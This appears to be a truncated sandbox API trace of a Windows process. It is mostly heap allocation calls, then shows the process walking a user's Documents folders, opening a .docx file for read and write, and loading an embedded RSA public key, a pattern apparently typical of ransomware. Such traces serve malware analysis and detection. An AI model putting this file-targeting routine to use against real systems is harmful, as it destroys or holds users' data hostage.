RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0244.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0244.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0244.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0244.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0244.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0244.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0244.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0244.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0244.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0244.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0244.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0244.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0244.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0244.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0244.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0244.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0244.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0244.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0244.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0244.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0244.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0244.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0244.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0244.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0244.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0244.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.727] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\") returned="ma0LRjiKCyKK4\\" [0244.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0244.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eb50 [0244.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.728] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\") returned="gTnYqN V h\\" [0244.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a220 [0244.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eb50 | out: hHeap=0x620000) returned 1 [0244.728] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\") returned="ZLJLwY4 p8u\\" [0244.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0244.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a220 | out: hHeap=0x620000) returned 1 [0244.728] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\") returned="Ji_heo\\" [0244.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0244.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d188 | out: hHeap=0x620000) returned 1 [0244.728] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0244.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7998 [0244.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0244.728] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0244.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0244.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0244.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0244.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7998 | out: hHeap=0x620000) returned 1 [0244.728] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0244.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0244.728] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0244.729] PathFindFileNameW (pszPath="") returned="" [0244.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0244.739] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a7731c0, ftCreationTime.dwHighDateTime=0x1d5bb4e, ftLastAccessTime.dwLowDateTime=0xedbdb690, ftLastAccessTime.dwHighDateTime=0x1d5b5bc, ftLastWriteTime.dwLowDateTime=0xedbdb690, ftLastWriteTime.dwHighDateTime=0x1d5b5bc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0244.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0244.743] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a7731c0, ftCreationTime.dwHighDateTime=0x1d5bb4e, ftLastAccessTime.dwLowDateTime=0xedbdb690, ftLastAccessTime.dwHighDateTime=0x1d5b5bc, ftLastWriteTime.dwLowDateTime=0xedbdb690, ftLastWriteTime.dwHighDateTime=0x1d5b5bc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0244.743] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1c9c770, ftCreationTime.dwHighDateTime=0x1d5be0a, ftLastAccessTime.dwLowDateTime=0xfe2d3270, ftLastAccessTime.dwHighDateTime=0x1d5be00, ftLastWriteTime.dwLowDateTime=0xfe2d3270, ftLastWriteTime.dwHighDateTime=0x1d5be00, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D0CsPE54nS", cAlternateFileName="D0CSPE~1")) returned 1 [0244.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0244.743] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799d3e60, ftCreationTime.dwHighDateTime=0x1d5bbe9, ftLastAccessTime.dwLowDateTime=0xe96dc500, ftLastAccessTime.dwHighDateTime=0x1d5b78b, ftLastWriteTime.dwLowDateTime=0xe96dc500, ftLastWriteTime.dwHighDateTime=0x1d5b78b, nFileSizeHigh=0x0, nFileSizeLow=0xaf10, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="o-VEn20ISOuQV.docx", cAlternateFileName="O-VEN2~1.DOC")) returned 1 [0244.743] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o-VEn20ISOuQV.docx") returned=".docx" [0244.743] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o-VEn20ISOuQV.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\o-ven20isouqv.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0244.745] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=44816) returned 1 [0244.745] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0244.757] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xaeea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.757] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0244.759] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0xaf10, lpOverlapped=0x0) returned 1 [0244.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0244.761] lstrlenA (lpString="-----BEGIN PUBLIC 